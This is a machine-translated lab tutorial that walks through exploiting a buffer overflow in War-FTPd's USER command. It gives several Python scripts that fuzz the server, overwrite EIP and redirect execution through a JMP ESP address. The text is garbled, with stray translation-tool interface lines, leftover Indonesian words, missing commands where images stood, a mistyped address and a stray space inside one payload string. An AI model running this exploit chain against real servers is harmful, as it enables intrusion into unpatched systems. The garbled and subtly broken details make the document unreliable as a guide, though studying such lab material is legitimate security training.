Step by step Buffer OverFlow WarFtp

Run windows on virtualbox
open war-ftpd file, after the open click go online
ollydebugger open, click the menu, select the war file attach-ftp is running, click the play button
Log in backtrak console, create a fuzzer as fuzzer.py
Write the script below on the fuzzer

#!/usr/bin/python

import socket

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

buffer= "\x41" * 1000

s.connect (('192.168.56.101',21))

data=s.recv (1024)

print ("Sending evil data via USER command...")

s.send ('USER '+buffer+'\r\n')

data=s.recv (1024)

s.send ('PASS PASSWORD'+'\r\n')

s.close()

print ("Finish")

After writing the script above, run this command

 This command is to ascertain whether the war-ftp is actually running
After that, type the command

After doing the fuzzing process. consider what happens in war-ftp, if it has an error message appears

Did you mean: Setelah menuliskan script di atas, jalankan perintah ini

Type text or a website address or translate a document.

Cancel

Once there is an error like the above, it is time to figure out how to register into the EIP register stack, having known the byte is loaded by 32 bit value, which contains an address which is stored inside the payload to be executed. There are several ways to find out, the byte register keberapa piled by the data transmitted by the fuzzer, among others, with the help exploit metasploit framwork.
As for how:

Once inside the metasploit framwork, then type the following command to make the data as much as 1000 bytes, which is saved into a file string_pattern.txt suiting the picture below

 This is the contents of string_pattern.txt

after the above step, the next step is to enter the above data into the application fuzzer that has been made ​​ previously. Data pattern which will replace the character "A" on the fuzzer.

 

 Repeat the previous one

 See the display on ollydebugger

Different from the previous figure, the current value of the register in memory warFTP application server has been charged with a string pattern that had been incorporated into the application fuzzer.
Having managed to crash the application using the pattern of existing data, the next step is to find the string keberapa byte overwrite the existing registers. To do so, will use tools that both the pattern.offset.rb

The next is to customize the application fuzzer in changing the existing buffer variables and add variables didalmnya EIP value. For more details see the following script.

#!/usr/bin/python

import socket

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

nilaiEIP = "\x90" * 485

nilaiEIP+= "\xEF\xBE\xAD\xDE"

#buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad$

#buffer= "\x41" * 1000

s.connect (('192.168.56.101',21))

data=s.recv (1024)

print ("Sending evil data via USER command...")

s.send ('USER '+nilaiEIP+'\r\n')

#s.send ('USER '+buffer+'\r\n')

data=s.recv (1024)

s.send ('PASS PASSWORD'+'\r\n')

s.close()

print ("Finish")

 

Apparent that there is value in the EIP register has been changed to DEADBEEF, next is to try to write ESP, where ESP is a temporary data storage area in memory. To test our script will do the customization in the existing application fuzzer, for more details see the script below: 

#!/usr/bin/python

import socket

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

buffer = "\x90" * 485

buffer+= "\xEF\xBE\xAD\xDE"

buffer+= "\x90" * (493-len(buffer))

buffer+= "\xCC" * (1000-len(buffer))

#nilaiEIP = "\x90" * 485

#nilaiEIP+= "\xEF\xBE\xAD\xDE"

#buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad$

#buffer= "\x41" * 1000

s.connect (('192.168.56.101',21))

data=s.recv (1024)

#print ("Sending evil data via USER command...")

#s.send ('USER '+nilaiEIP+'\r\n')

s.send ('USER '+buffer+'\r\n')

data=s.recv (1024)

s.send ('PASS PASSWORD'+'\r\n')

s.close()

#print ("Finish")

 

Furthermore JMP ESP search in memory of existing applications, the following steps 

At Ollidbg application, choose the menu, view menu and then select Executable Modules

The next search command JMP ESP, remedy do right click on the main window, search for, command a new window will appear and type the JMP ESP.

in the case of nature that emerges is 7CA58265 FFE4 JMP ESP, before adding the JMP ESP address the fuzzer script, the first thing to do is change the address offset into little endian format, from 7ACA58265 become \ x65 \ x82 \ xA5 \ x7C.

#!/usr/bin/python

import socket

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

buffer = "\x90" * 485

buffer+= "\x65\x82\xA5\x7C "

buffer+= "\xCC" * (493-len(buffer))

buffer+= "\xCC" * (1000 - len(buffer))

#nilaiEIP = "\x90" * 485

#nilaiEIP+= "\xEF\xBE\xAD\xDE"

#buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad$

#buffer= "\x41" * 1000

s.connect (('192.168.56.101',21))

data=s.recv (1024)

#print ("Sending evil data via USER command...")

#s.send ('USER '+nilaiEIP+'\r\n')

s.send ('USER '+buffer+'\r\n')

data=s.recv (1024)

s.send ('PASS PASSWORD'+'\r\n')

s.close()

#print ("Finish")